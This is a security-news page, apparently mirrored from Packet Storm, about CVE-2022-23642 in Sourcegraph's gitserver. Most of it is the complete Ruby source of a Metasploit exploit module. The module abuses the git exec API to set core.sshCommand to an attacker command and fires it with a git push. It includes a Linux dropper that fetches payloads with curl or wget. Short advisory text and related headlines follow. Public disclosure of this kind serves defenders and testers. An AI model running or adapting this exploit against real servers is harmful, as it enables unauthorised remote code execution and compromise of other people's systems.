Security
Headlines
HeadlinesLatestCVEs

Headline

Sourcegraph gitserver sshCommand Remote Command Execution

A vulnerability exists within Sourcegraph’s gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API.

Packet Storm
#vulnerability#linux#js#git#rce#auth#ssh
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sourcegraph gitserver sshCommand RCE',        'Description' => %q{          A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute          arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can          then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a          feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the          commands that are able to be executed through the git exec REST API.        },        'Author' => [          'Altelus1', # github PoC          'Spencer McIntyre' # metasploit module        ],        'References' => [          ['CVE', '2022-23642'],          ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],          ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],        ],        'DisclosureDate' => '2022-02-18', # Public disclosure        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory            },          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              # when the OS command is executed, it's executed twice which will cause some of the command stagers to              # be corrupt, these two work even for larger payloads because they're downloaded in a single command              'CmdStagerFlavor' => %w[curl wget],              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper            },          ]        ],        'DefaultOptions' => {          'RPORT' => 3178        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/']),      OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])    ])  end  def check    res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand'])    return CheckCode::Unknown unless res    if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/      # this is the response if the target repo does exist, highly unlikely since it's randomized      return CheckCode::Vulnerable('Successfully set core.sshCommand.')    elsif res.code == 404 && res.body =~ /"cloneInProgress"/      # this is the response if the target repo does not exist      return CheckCode::Vulnerable    elsif res.code == 400 && res.body =~ /^invalid command/      # this is the response when the server is patched, regardless of if there are cloned repos      return CheckCode::Safe    end    CheckCode::Unknown  end  def exploit    if datastore['EXISTING_REPO'].blank?      @git_repo = send_request_list.sample      fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo      print_status("Using automatically identified repository: #{@git_repo}")    else      @git_repo = datastore['EXISTING_REPO']    end    print_status("Executing #{target.name} target")    @git_origin = Rex::Text.rand_text_alphanumeric(4..11)    git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git"    vprint_status("Using #{@git_origin} as a fake git origin")    send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote])    case target['Type']    when :unix_memory      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  end  def cleanup    return unless @git_repo && @git_origin    vprint_status('Cleaning up the git changes...')    # delete the remote that was created    send_request_exec(@git_repo, ['remote', 'remove', @git_origin])    # unset the core.sshCommand value    send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])  ensure    super  end  def send_request_exec(repo, args, timeout = 20)    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'exec'),      'method' => 'POST',      'data' => {        'Repo' => repo,        'Args' => args      }.to_json    }, timeout)  end  def send_request_list    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'list'),      'method' => 'GET',      'vars_get' => { 'cloned' => 'true' }    })    fail_with(Failure::Unreachable, 'No server response.') unless res    fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array)    res.get_json_document  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])    fail_with(Failure::Unreachable, 'No server response.') unless res    unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/      if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false        fail_with(Failure::BadConfig, 'The specified repository has not been cloned.')      end      fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.')    end    send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)  endend

Related news

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.

CVE-2022-23642

Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.

Packet Storm: Latest News

ABB Cylon Aspect 3.08.01 persistenceManagerAjax.php Directory Traversal